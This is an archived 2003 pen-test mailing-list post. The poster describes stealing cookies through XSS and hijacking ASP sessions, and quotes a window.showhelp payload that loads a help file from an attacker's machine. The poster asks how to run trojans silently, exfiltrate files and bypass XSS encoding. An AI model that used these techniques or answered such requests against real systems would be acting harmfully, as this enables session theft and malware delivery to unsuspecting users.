RE: Proof of Concept Tool on Web Application Security

From: Indian Tiger (indiantiger@mailandnews.com)
Date: 04/23/03

  • Next message: Ollie Whitehouse: "@stake port announcement: ncpquery for win32 now posted to razor.bindview.com"
    From: "Indian Tiger" <indiantiger@mailandnews.com>
    To: "pen test" <Pen-test@securityfocus.com>
    Date: Wed, 23 Apr 2003 12:50:54 +0530
    
    

    Hey Everybody,

    First of all thank you very much to Robert, Rogan, Steve, Nicolas and Leah
    for
    their guidance to test XSS and Session ID brute force attack.

    Now I can transfer victim’s cookie to another location successfully. I have
    tested XSS to transfer cookie using following three ways:
    1. Using document.location
    2. Using Image src
    3. Using hidden fields

    The cookie, which I am getting, is of current application only mean If I am
    accessing
    www.hotmail.com I will be getting only Hotmail's session ID asigned to me
    for that session.

    Now how can I steal all cookies stored on the victim’s machine? or how to
    transfer a file
    from Victim machine using Client Side Scripting or any other way?

    Some sites converts < and > tags into &lt; and &gt; to protect them selves
    from XSS attacks. Is there any way to bypass this protection?

    I was testing some trojan execution using XSS. In this process I was able to
    run help file 31users.chm from attackers machine to victims machine as
    follows:
    window.showhelp(file:///XXX. XXX. XXX. XXX/c:/windows/help/31users.chm)
    Is it possible to run some trojan or activex componenet instead of help
    file?
    Without alerting for any pop-up.
    Is this possible to write some malicious help file? (These files not even
    ask
    before execution.)

    As per IDefence’s Article on “Brute forcing Session ID” some time session ID
    is random. I have tested this against six sites and I was not much lucky to
    get session IDs in which only last 3-4 digits are changing.
    What do you think in practice still are they so? Since iDEFENSE has
    published
    this research in Nov 2001 and current scenario might be a bit changed.

    In my research of six sites, four sites were using ASP session variable to
    generated session ID and remaining two their own.

    I was able to hijack ASP sessions using session IDs. In my testing, first I
    have logged in as user1, got his session ID and using user1’s session ID, I
    was able to hijack user1.

    Any help on this would be highly appreciated.

    Thanking You.
    Sincerely,

    Indian Tiger, CISSP

    ---------------------------------------------------------------------------
    Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
    world's premier event for IT and network security experts. The two-day
    Training features 6 hand-on courses on May 12-13 taught by professionals.
    The two-day Briefings on May 14-15 features 24 top speakers with no vendor
    sales pitches. Deadline for the best rates is April 25. Register today to
    ensure your place. http://www.securityfocus.com/BlackHat-pen-test
    ----------------------------------------------------------------------------


  • Next message: Ollie Whitehouse: "@stake port announcement: ncpquery for win32 now posted to razor.bindview.com"